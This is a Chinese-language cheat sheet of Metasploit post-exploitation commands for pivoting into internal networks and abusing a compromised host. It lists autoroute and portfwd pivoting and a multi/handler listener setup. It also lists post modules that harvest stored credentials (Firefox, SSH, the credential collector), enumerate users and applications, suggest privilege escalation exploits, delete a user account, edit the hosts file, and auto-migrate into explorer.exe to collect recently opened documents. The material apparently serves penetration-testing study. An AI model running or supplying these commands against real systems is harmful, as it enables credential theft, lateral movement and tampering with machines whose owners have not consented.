后渗透阶段-跳板、POST模块

跳板

autoroute
  • 利用已经控制的一台计算机作为入侵内网的跳板
  • 在其它内网计算机看来访问全部来自跳板机
  • run autoroute -s 2.2.2.0/24 #不能访问外网的目标网段
  • run autoroute -p
  • use auxiliary/scanner/portscan/tcp

portfwd
  • 利用已经被控计算机,在kali与攻击目标之间实现端口转发
  • portfwd add -L LIP -l LPORT -r RIP -p RPORT
  • portfwd list /delete/flush

POST

  • use exploit/multi/handler
  • set exitonsession false当建立一个session后不会退出
  • run -j -z

  • meterpreter >

  • run post/windows/gather/arp_scanner RHOSTS=192.168.43.0/24

  • run post/windows/gather/checkvm

  • run post/windows/gather/credentials/credential_collector

  • run post/windows/gather/enum_applications

  • run post/windows/gather/enum_logged_on_users

  • run post/windows/gather/enum_snmp

  • run post/multi/recon/local_exploit_suggester检查可用的本地提权漏洞模块

  • run post/windows/manage/delete_user USERNAME=flower

  • run post/multi/gather/firefox_creds 收集firefox缓存的账户密码

  • run post/multi/gather/ssh_creds 收集ssh身份认证信息

  • run post/multi/gather/check_malware REMOTEFILE=c:\\windows\\system32\\cmd.exe

  • run hostsedit -e 1.1.1.1 www.baidu.com 编辑hosts文件


  • 自动执行meterpreter脚本

    • set AutoRunScript migrate -N explorer.exe

    • set InitialAutoRunScript checkvm

  • 自动执行post模块

    • set InitialAutoRunScript migrate -n explorer.exe
    • set AutoRunScript post/windows/gather/dumplinks收集最近打开的文档(首先要先切换到目标用户,migrate目标用户所在进程)
    • InitialAutoRunScript 先于 AutoRunScript执行